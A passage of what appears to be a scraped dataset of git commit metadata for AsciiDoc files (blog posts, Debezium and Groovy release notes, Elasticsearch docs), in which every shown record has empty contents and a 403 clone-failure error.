/creative-coding-bonn.github.io,marioandres\/marioandres.github.io,tofusoul\/tofusoul.github.io,chowwin\/chowwin.github.io,carsnwd\/carsnwd.github.io,mattpearson\/mattpearson.github.io,sandersky\/sandersky.github.io,roobyz\/roobyz.github.io,wattsap\/wattsap.github.io,dsp25no\/blog.dsp25no.ru,nickwanhere\/nickwanhere.github.io,jaredmorgs\/jaredmorgs.github.io,wattsap\/wattsap.github.io,roamarox\/roamarox.github.io,ghostbind\/ghostbind.github.io,CreditCardsCom\/creditcardscom.github.io,hytgbn\/hytgbn.github.io,deivisk\/deivisk.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,YJSoft\/yjsoft.github.io,codechunks\/codechunks.github.io,wiibaa\/wiibaa.github.io,richard-popham\/richard-popham.github.io,rishipatel\/rishipatel.github.io,sebasmonia\/sebasmonia.github.io,unay-cilamega\/unay-cilamega.github.io,blackgun\/blackgun.github.io,raghakot\/raghakot.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,gjagush\/gjagush.github.io,MatanRubin\/MatanRubin.github.io,DominikVogel\/DominikVogel.github.io,xvin3t\/xvin3t.github.io,ElteHupkes\/eltehupkes.github.io,polarbill\/polarbill.github.io,fqure\/fqure.github.io,oppemism\/oppemism.github.io,everydaynormalgeek\/everydaynormalgeek.github.io,ovo-6\/ovo-6.github.io,Aerodactyl\/a
erodactyl.github.io,hitamutable\/hitamutable.github.io,HiDAl\/hidal.github.io,tjfy1992\/tjfy1992.github.io,kai-cn\/kai-cn.github.io,Bulletninja\/bulletninja.github.io,willyb321\/willyb321.github.io,grzrobak\/grzrobak.github.io,eyalpost\/eyalpost.github.io,fbruch\/fbruch.github.com,izziiyt\/izziiyt.github.io,ciekawy\/ciekawy.github.io,dfjs\/dfjs.github.io,bigkahuna1uk\/bigkahuna1uk.github.io,faldah\/faldah.github.io,severin31\/severin31.github.io,deformat\/deformat.github.io,laposheureux\/laposheureux.github.io,doochik\/doochik.github.io,thrasos\/thrasos.github.io,allancorra\/allancorra.github.io,crimarde\/crimarde.github.io,yaks-all-the-way-down\/yaks-all-the-way-down.github.io,yahussain\/yahussain.github.io,preteritoimperfecto\/preteritoimperfecto.github.io,introspectively\/introspectively.github.io,eduardo76609\/eduardo76609.github.io,mkaptein172\/mkaptein172.github.io,hytgbn\/hytgbn.github.io,sidmusa\/sidmusa.github.io,ecmeyva\/ecmeyva.github.io,StefanBertels\/stefanbertels.github.io,iamthinkking\/iamthinkking.github.io,cothan\/cothan.github.io,elvarb\/elvarb.github.io,s-f-ek971\/s-f-ek971.github.io,skeate\/skeate.github.io,cringler\/cringler.github.io,everydaynormalgeek\/everydaynormalgeek.github.io,2wce\/2wce.github.io,rage5474\/rage5474.github.io,mattpearson\/mattpearson.github.io,bitcowboy\/bitcowboy.github.io,deivisk\/deivisk.github.io,sebbrousse\/sebbrousse.github.io,metasean\/blog,neuni\/neuni.github.io,JithinPavithran\/JithinPavithran.github.io,vs4vijay\/vs4vijay.github.io,iwangkai\/iwangkai.github.io,tjfy1992\/tjfy1992.github.io,pysaumont\/pysaumont.github.io,arthurmolina\/arthurmolina.github.io,txemis\/txemis.github.io,rushil-patel\/rushil-patel.github.io,tamakinkun\/tamakinkun.github.io,romanegunkov\/romanegunkov.github.io,sinemaga\/sinemaga.github.io,jivank\/jivank.github.io,Nekothrace\/nekothrace.github.io,topicusonderwijs\/topicusonderwijs.github.io,kreids\/kreids.github.io,pdudits\/pdudits.github.io,rballan\/rballan.github.io,RaphaelSparK\/RaphaelSparK.github.io,siarlex\/siarlex.github.io,itsashis4u\/hubpress.io,murilo140891\/murilo140891.github.io,fqure\/fqure.github.io,itsashis4u\/hubpress.io,joelcbailey\/joelcbailey.github.io,oldkoyot\/oldkoyot.github.io,oppemism\/oppemism.github.io,cringler\/cringler.github.io,cncgl\/cncgl.github.io,iveskins\/iveskins.github.io,fuzzy-logic\/fuzzy-logic.github.io,iamthinkking\/iamthinkking.github.io,bigkahuna1uk\/bigkahuna1uk.github.io,karcot\/trial1,siarlex\/siarlex.github.io,s-f-ek971\/s-f-ek971.github.io,hytgbn\/hytgbn.github.io,gardenias\/sddb.com,oppemism\/oppemism.github.io,gdfuentes\/gdfuentes.github.io,manikmagar\/manikmagar.github.io,anshu92\/blog,Driven-Development\/Driven-Development.github.io,mattdoesinfosec\/mattdoesinfosec.github.io,AppHat\/AppHat.github.io,adler-j\/adler-j.github.io,SuperMMX\/supermmx.github.io,gardenias\/sddb.com,wayr\/wayr.github.io,pwlprg\/pwlprg.github.io,uskithub\/uskithub.github.io,tamakinkun\/tamakinkun.github.io,deruelle\/deruelle.github.io,endymion64\/endymion64.github.io,scottellis64\/scottellis64.github.io,alimasyhur\/alimasyhur.github.io,joelcbailey\/joelcbailey.github.io,AppHat\/AppHat.github.io,OctavioMaia\/octaviomaia.github.io,willyb321\/willyb321.github.io,icthieves\/icthieves.github.io,cothan\/cothan.github.io,eyalpost\/eyalpost.github.io,jtsiros\/jtsiros.github.io,jia1miao\/jia1miao.github.io,endymion64\/VinJBlog,jivank\/jivank.github.io,quangpc\/quangpc.github.io,chaseey\/chaseey.github.io,devananda\/devananda.github.io,timelf123\/timelf123.github.io,mkorevec\/mkorevec.github.io,tjfy19
92\/tjfy1992.github.io,codingkapoor\/codingkapoor.github.io,fuzzy-logic\/fuzzy-logic.github.io,gquintana\/gquintana.github.io,thomasgwills\/thomasgwills.github.io,debbiezhu\/debbiezhu.github.io,miroque\/shirokuma,carlomorelli\/carlomorelli.github.io,pokev25\/pokev25.github.io,darsto\/darsto.github.io,ecommandeur\/ecommandeur.github.io,birvajoshi\/birvajoshi.github.io,seatones\/seatones.github.io,innovation-yagasaki\/innovation-yagasaki.github.io,everydaynormalgeek\/everydaynormalgeek.github.io,gdfuentes\/gdfuentes.github.io,birvajoshi\/birvajoshi.github.io,Bulletninja\/bulletninja.github.io,ghostbind\/ghostbind.github.io,TinkeringAlways\/tinkeringalways.github.io,jarcane\/jarcane.github.io,itsashis4u\/hubpress.io,txemis\/txemis.github.io,patricekrakow\/patricekrakow.github.io,neurodiversitas\/neurodiversitas.github.io,tamakinkun\/tamakinkun.github.io,kimkha-blog\/kimkha-blog.github.io,fadlee\/fadlee.github.io,neocarvajal\/neocarvajal.github.io,macchandev\/macchandev.github.io,metasean\/hubpress.io,gquintana\/gquintana.github.io,plaidshirtguy\/plaidshirtguy.github.io,carlosdominguezmartin\/carlosdominguezmartin.github.io,zakkum42\/zakkum42.github.io,dingboopt\/dingboopt.github.io,alchemistcookbook\/alchemistcookbook.github.io,roobyz\/roobyz.github.io,theblankpages\/theblankpages.github.io,DullestSaga\/dullestsaga.github.io,mmhchan\/mmhchan.github.io,mikealdo\/mikealdo.github.io,mmhchan\/mmhchan.github.io,qu85101522\/qu85101522.github.io,crimarde\/crimarde.github.io,emilio2hd\/emilio2hd.github.io,sidmusa\/sidmusa.github.io,pzmarzly\/g2zory,minicz\/minicz.github.io,xquery\/xquery.github.io,velo\/velo.github.io,chrizco\/chrizco.github.io,dannylane\/dannylane.github.io,mnishihan\/mnishihan.github.io,nnn-dev\/nnn-dev.github.io,pokev25\/pokev25.github.io,MatanRubin\/MatanRubin.github.io,blogforfun\/blogforfun.github.io,lmcro\/hubpress.io,ktekbiyikiletisim\/ktekbiyikiletisim.github.io,nanox77\/nanox77.github.io,thomasgwills\/thomasgwills.github.io,shutas\/shutas.github.io,yahussain\/yahussain.github.io,timelf123\/timelf123.github.io,nbourdin\/nbourdin.github.io,diogoan\/diogoan.github.io,kimkha-blog\/kimkha-blog.github.io,itsallanillusion\/itsallanillusion.github.io,juliosueiras\/juliosueiras.github.io,hoernschen\/hoernschen.github.io,HiDAl\/hidal.github.io,alexbleasdale\/alexbleasdale.github.io,hutchr\/hutchr.github.io,hoernschen\/hoernschen.github.io,neurodiversitas\/neurodiversitas.github.io,scottellis64\/scottellis64.github.io,hirako2000\/hirako2000.github.io,Easter-Egg\/Easter-Egg.github.io,fadlee\/fadlee.github.io,akoskovacsblog\/akoskovacsblog.github.io,tkountis\/tkountis.github.io,ahopkins\/amhopkins.com,chdask\/chdask.github.io,YannDanthu\/YannDanthu.github.io,neocarvajal\/neocarvajal.github.io,Mr-IP-Kurtz\/mr-ip-kurtz.github.io,thomasgwills\/thomasgwills.github.io,mkorevec\/mkorevec.github.io,kr-b\/kr-b.github.io,drankush\/drankush.github.io,parkowski\/parkowski.github.io,raisedadead\/hubpress.io,pokev25\/pokev25.github.io,wayr\/wayr.github.io,willyb321\/willyb321.github.io,laura-arreola\/laura-arreola.github.io,mozillahonduras\/mozillahonduras.github.io,gorjason\/gorjason.github.io,kreids\/kreids.github.io,warpcoil\/warpcoil.github.io,tr00per\/tr00per.github.io,ashelle\/ashelle.github.io,chrizco\/chrizco.github.io,alchemistcookbook\/alchemistcookbook.github.io,Tekl\/tekl.github.io,cothan\/cothan.github.io,jmelfi\/jmelfi.github.io,thockenb\/thockenb.github.io,angilent\/angilent.github.io,kay\/kay.github.io,pallewela\/pallewela.github.io,blayhem\/blayhem.github.io,kfkelvinng\/kfkelvinng.gi
thub.io,simevidas\/simevidas.github.io,jbutzprojects\/jbutzprojects.github.io,railsdev\/railsdev.github.io,sinemaga\/sinemaga.github.io,fqure\/fqure.github.io,nnn-dev\/nnn-dev.github.io,SingularityMatrix\/SingularityMatrix.github.io,flipswitchingmonkey\/flipswitchingmonkey.github.io,Murazaki\/murazaki.github.io,kfkelvinng\/kfkelvinng.github.io,dsp25no\/blog.dsp25no.ru,Brzhk\/Brzhk.github.io,doochik\/doochik.github.io,tedroeloffzen\/tedroeloffzen.github.io,ComradeCookie\/comradecookie.github.io,sebasmonia\/sebasmonia.github.io,djmdata\/djmdata.github.io,sebasmonia\/sebasmonia.github.io,yuyudhan\/yuyudhan.github.io,sskorol\/sskorol.github.io,TunnyTraffic\/gh-hosting,nicolasmaurice\/nicolasmaurice.github.io,emtudo\/emtudo.github.io,zhuo2015\/zhuo2015.github.io,HubPress\/hubpress.io,SuperMMX\/supermmx.github.io,hytgbn\/hytgbn.github.io,uzuyh\/hubpress.io,warpcoil\/warpcoil.github.io,nilsonline\/nilsonline.github.io,mkaptein172\/mkaptein172.github.io,txemis\/txemis.github.io,AppHat\/AppHat.github.io,johannewinwood\/johannewinwood.github.io,zestyroxy\/zestyroxy.github.io,DullestSaga\/dullestsaga.github.io,kosssi\/blog,cncgl\/cncgl.github.io,wushaobo\/wushaobo.github.io,qeist\/qeist.github.io,Oziabr\/Oziabr.github.io,willyb321\/willyb321.github.io,deivisk\/deivisk.github.io,Dhuck\/dhuck.github.io,pzmarzly\/pzmarzly.github.io,DominikVogel\/DominikVogel.github.io,flug\/flug.github.io,spikebachman\/spikebachman.github.io,tofusoul\/tofusoul.github.io,3991\/3991.github.io,nilsonline\/nilsonline.github.io,jbrizio\/jbrizio.github.io,mattdoesinfosec\/mattdoesinfosec.github.io,xfarm001\/xfarm001.github.io,flug\/flug.github.io,thomaszahr\/thomaszahr.github.io,iamthinkking\/iamthinkking.github.io,oppemism\/oppemism.github.io,ComradeCookie\/comradecookie.github.io,kr-b\/kr-b.github.io,apalkoff\/apalkoff.github.io,MichaelIT\/MichaelIT.github.io,gjagush\/gjagush.github.io,mikealdo\/mikealdo.github.io,hitamutable\/hitamutable.github.io,blogforfun\/blogforfun.github.io,nilsonline\/nilsonline.github.io,deunz\/deunz.github.io,rage5474\/rage5474.github.io,realraindust\/realraindust.github.io,pysysops\/pysysops.github.io,oldkoyot\/oldkoyot.github.io","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bithunshal\/shalsblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8a440b28868176367cb87f136d1869800738ea77","subject":"KOGITO-5289 Kogito DRL guide","message":"KOGITO-5289 Kogito DRL guide\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/kogito-drl.adoc","new_file":"docs\/src\/main\/asciidoc\/kogito-drl.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"475773249dceab42d046a70e978b9f92cfc0c38d","subject":":sparkles: better-es5","message":":sparkles: better-es5\n","repos":"syon\/refills","old_file":"src\/refills\/javascript\/better-es5.adoc","new_file":"src\/refills\/javascript\/better-es5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/syon\/refills.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"afc4e5f0f740948fe7dc773100748a0812c03ac6","subject":"y2b create 
post EA Sports Active 2 Unboxing \\u0026 Overview","message":"y2b create post EA Sports Active 2 Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-02-20-EA-Sports-Active-2-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2011-02-20-EA-Sports-Active-2-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"416b52083d2357b950b3428364bf8e5548d0a23a","subject":"Update README","message":"Update README\n","repos":"pjanouch\/hex","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pjanouch\/hex.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"9842231dd554d630eaae05e26afbe1ebb93b15ac","subject":"Update 2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","message":"Update 2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","new_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"337a041f2019ce937d2c2dd5bc4a54b4b5d11064","subject":"Update 2017-03-10-Im-K-O-O-V-E-R.adoc","message":"Update 2017-03-10-Im-K-O-O-V-E-R.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-10-Im-K-O-O-V-E-R.adoc","new_file":"_posts\/2017-03-10-Im-K-O-O-V-E-R.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e5b5986c84ca9351728797cbeadc7a0e7418929f","subject":"Update 2017-06-28-Test-post-2017.adoc","message":"Update 2017-06-28-Test-post-2017.adoc","repos":"anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog","old_file":"_posts\/2017-06-28-Test-post-2017.adoc","new_file":"_posts\/2017-06-28-Test-post-2017.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anthonny\/personal-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4f22daa2e321b4a9025f53bc3b428b9b6c8a0790","subject":"Update 2018-11-27-Hugo-Ascii-Doc.adoc","message":"Update 2018-11-27-Hugo-Ascii-Doc.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-27-Hugo-Ascii-Doc.adoc","new_file":"_posts\/2018-11-27-Hugo-Ascii-Doc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3ef9e4607b2405d43c893eef0b1d086ef20704c4","subject":"Update 2016-02-26-Test.adoc","message":"Update 2016-02-26-Test.adoc","repos":"errorval\/blog,errorval\/blog,errorval\/blog","old_file":"_posts\/2016-02-26-Test.adoc","new_file":"_posts\/2016-02-26-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/errorval\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"98e2700444b209bef388aa6afec1204095bdd052","subject":"y2b create post World's Smallest Bluetooth Speaker!","message":"y2b create post World's Smallest Bluetooth Speaker!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-03-09-Worlds-Smallest-Bluetooth-Speaker.adoc","new_file":"_posts\/2016-03-09-Worlds-Smallest-Bluetooth-Speaker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6945e6f43ef02a06efe842097d44f27e57222c4d","subject":"Update 2017-07-15-Number-letter-count-Projeto-Euler.adoc","message":"Update 2017-07-15-Number-letter-count-Projeto-Euler.adoc","repos":"minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io","old_file":"_posts\/2017-07-15-Number-letter-count-Projeto-Euler.adoc","new_file":"_posts\/2017-07-15-Number-letter-count-Projeto-Euler.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/minicz\/minicz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4079e4f265f468f96b80815b370df8d74a41f970","subject":"Update 2016-02-16-All-Important-Context-Maps.adoc","message":"Update 2016-02-16-All-Important-Context-Maps.adoc","repos":"jmelfi\/jmelfi.github.io,jmelfi\/jmelfi.github.io,jmelfi\/jmelfi.github.io,jmelfi\/jmelfi.github.io","old_file":"_posts\/2016-02-16-All-Important-Context-Maps.adoc","new_file":"_posts\/2016-02-16-All-Important-Context-Maps.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jmelfi\/jmelfi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"92c4f14540bf43ef562912a57aca6c85f962e6c4","subject":"Update 2017-07-11-the-students-outpost-about.adoc","message":"Update 2017-07-11-the-students-outpost-about.adoc","repos":"TheStudentsOutpost\/TheStudentsOutpost.github.io,TheStudentsOutpost\/TheStudentsOutpost.github.io,TheStudentsOutpost\/TheStudentsOutpost.github.io,TheStudentsOutpost\/TheStudentsOutpost.github.io","old_file":"_posts\/2017-07-11-the-students-outpost-about.adoc","new_file":"_posts\/2017-07-11-the-students-outpost-about.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheStudentsOutpost\/TheStudentsOutpost.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"082fba0e8cb120013c230e43af83eeec452e7243","subject":"Import release notes for Groovy 1.8","message":"Import release notes for Groovy 
1.8\n","repos":"rahulsom\/sdkman-website,sdkman\/sdkman-website,marc0der\/groovy-website,marcoVermeulen\/groovy-website,benignbala\/groovy-website,sdkman\/sdkman-website,marc0der\/groovy-website,groovy\/groovy-website,groovy\/groovy-website,webkaz\/groovy-website,kevintanhongann\/groovy-website,kevintanhongann\/groovy-website,rahulsom\/sdkman-website,PascalSchumacher\/groovy-website,dmesu\/sdkman-website,marcoVermeulen\/groovy-website,benignbala\/groovy-website,webkaz\/groovy-website,m-ullrich\/groovy-website,dmesu\/sdkman-website","old_file":"site\/src\/site\/releasenotes\/groovy-1.8.adoc","new_file":"site\/src\/site\/releasenotes\/groovy-1.8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rahulsom\/sdkman-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d5b8bc393f1dfb1f222d681f6e0ce937f730a149","subject":"Title structure","message":"Title structure\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"DB from Eclipse.adoc","new_file":"DB from Eclipse.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f61a30afd493f13bbda9aaec78ca1636c33bde10","subject":"Add news\/2016-11-24-forge-3.4.0.final.asciidoc","message":"Add news\/2016-11-24-forge-3.4.0.final.asciidoc\n","repos":"forge\/docs,forge\/docs","old_file":"news\/2016-11-24-forge-3.4.0.final.asciidoc","new_file":"news\/2016-11-24-forge-3.4.0.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/forge\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"95946caca355ff33555fa79a63204cfaa9319168","subject":"y2b create post The 3D Optical Illusion Lamp","message":"y2b create post The 3D Optical Illusion Lamp","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-05-06-The-3D-Optical-Illusion-Lamp.adoc","new_file":"_posts\/2016-05-06-The-3D-Optical-Illusion-Lamp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"037cb6f36dbef2ca1de1b90932192fd402fcf8bc","subject":"Update 2015-02-20-Mistaken-Million.adoc","message":"Update 2015-02-20-Mistaken-Million.adoc","repos":"fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io","old_file":"_posts\/2015-02-20-Mistaken-Million.adoc","new_file":"_posts\/2015-02-20-Mistaken-Million.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fqure\/fqure.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b99bbe56d53e2ea6746017336475df4bfe6e8149","subject":"Update 2015-06-18-hello-word.adoc","message":"Update 
2015-06-18-hello-word.adoc","repos":"miplayer1\/miplayer1.github.io,miplayer1\/miplayer1.github.io,miplayer1\/miplayer1.github.io","old_file":"_posts\/2015-06-18-hello-word.adoc","new_file":"_posts\/2015-06-18-hello-word.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miplayer1\/miplayer1.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bd1ab49c689c62cf5c0394c1b079a202bb5680e0","subject":"Update 2017-05-28-First-post.adoc","message":"Update 2017-05-28-First-post.adoc","repos":"dsp25no\/blog.dsp25no.ru,dsp25no\/blog.dsp25no.ru,dsp25no\/blog.dsp25no.ru,dsp25no\/blog.dsp25no.ru","old_file":"_posts\/2017-05-28-First-post.adoc","new_file":"_posts\/2017-05-28-First-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dsp25no\/blog.dsp25no.ru.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c9db172b0ccf5186d9f4296ac5eeea84e5f332ad","subject":"add pending checkingOutAnExampleBranch","message":"add pending checkingOutAnExampleBranch\n","repos":"shearer12345\/graphicsByExample,AdamDWalker\/Graphics-Work","old_file":"doc\/_includes\/checkingOutAnExampleBranch.asciidoc","new_file":"doc\/_includes\/checkingOutAnExampleBranch.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/AdamDWalker\/Graphics-Work.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ee93e0abc5de9b46ef60be8d8410af0fae46ec7f","subject":"Adding 0.10.0.Beta1 release announcement","message":"Adding 0.10.0.Beta1 release announcement\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2019-06-12-debezium-0-10-0-beta1-released.adoc","new_file":"blog\/2019-06-12-debezium-0-10-0-beta1-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a6295a282e36b6ca7a0a7bfa50dd4214e9a7f848","subject":"Update 2016-06-24-mintia-and-frisk-by-arduino.adoc","message":"Update 2016-06-24-mintia-and-frisk-by-arduino.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-24-mintia-and-frisk-by-arduino.adoc","new_file":"_posts\/2016-06-24-mintia-and-frisk-by-arduino.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"78e213d70a37a8a165aad98d9fe4eecdbbb21db7","subject":"Debezium 1.7 release announcement","message":"Debezium 1.7 release announcement\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"_posts\/2021-10-04-debezium-1-7-final-released.adoc","new_file":"_posts\/2021-10-04-debezium-1-7-final-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} 
{"commit":"d13078546a0b5fb2dd63fd449d702ab88b768315","subject":"Docs: Fixed malforme table in geo-polygon query","message":"Docs: Fixed malforme table in geo-polygon query\n","repos":"jango2015\/elasticsearch,YosuaMichael\/elasticsearch,beiske\/elasticsearch,Siddartha07\/elasticsearch,adrianbk\/elasticsearch,mmaracic\/elasticsearch,acchen97\/elasticsearch,bestwpw\/elasticsearch,mnylen\/elasticsearch,jango2015\/elasticsearch,cnfire\/elasticsearch-1,tahaemin\/elasticsearch,ckclark\/elasticsearch,Brijeshrpatel9\/elasticsearch,sreeramjayan\/elasticsearch,fekaputra\/elasticsearch,linglaiyao1314\/elasticsearch,jbertouch\/elasticsearch,yynil\/elasticsearch,xingguang2013\/elasticsearch,apepper\/elasticsearch,martinstuga\/elasticsearch,wangtuo\/elasticsearch,awislowski\/elasticsearch,beiske\/elasticsearch,nomoa\/elasticsearch,lightslife\/elasticsearch,wbowling\/elasticsearch,gmarz\/elasticsearch,lks21c\/elasticsearch,himanshuag\/elasticsearch,strapdata\/elassandra-test,18098924759\/elasticsearch,sdauletau\/elasticsearch,ZTE-PaaS\/elasticsearch,yongminxia\/elasticsearch,achow\/elasticsearch,zhiqinghuang\/elasticsearch,nknize\/elasticsearch,awislowski\/elasticsearch,sarwarbhuiyan\/elasticsearch,rajanm\/elasticsearch,schonfeld\/elasticsearch,yanjunh\/elasticsearch,markwalkom\/elasticsearch,mikemccand\/elasticsearch,geidies\/elasticsearch,LeoYao\/elasticsearch,ESamir\/elasticsearch,LewayneNaidoo\/elasticsearch,fforbeck\/elasticsearch,pozhidaevak\/elasticsearch,vingupta3\/elasticsearch,schonfeld\/elasticsearch,cwurm\/elasticsearch,sreeramjayan\/elasticsearch,weipinghe\/elasticsearch,kenshin233\/elasticsearch,avikurapati\/elasticsearch,tahaemin\/elasticsearch,cwurm\/elasticsearch,mcku\/elasticsearch,HonzaKral\/elasticsearch,iacdingping\/elasticsearch,onegambler\/elasticsearch,lzo\/elasticsearch-1,andrestc\/elasticsearch,kaneshin\/elasticsearch,tahaemin\/elasticsearch,kingaj\/elasticsearch,yanjunh\/elasticsearch,rajanm\/elasticsearch,yuy168\/elasticsearch,girirajsharma\/elasticsearch,sneivandt\/elasticsearch,bestwpw\/elasticsearch,btiernay\/elasticsearch,lmtwga\/elasticsearch,s1monw\/elasticsearch,cnfire\/elasticsearch-1,sposam\/elasticsearch,Widen\/elasticsearch,naveenhooda2000\/elasticsearch,JervyShi\/elasticsearch,obourgain\/elasticsearch,jeteve\/elasticsearch,btiernay\/elasticsearch,scorpionvicky\/elasticsearch,jimhooker2002\/elasticsearch,weipinghe\/elasticsearch,Shepard1212\/elasticsearch,nellicus\/elasticsearch,Shekharrajak\/elasticsearch,jango2015\/elasticsearch,tahaemin\/elasticsearch,GlenRSmith\/elasticsearch,bawse\/elasticsearch,jango2015\/elasticsearch,huanzhong\/elasticsearch,mortonsykes\/elasticsearch,jprante\/elasticsearch,areek\/elasticsearch,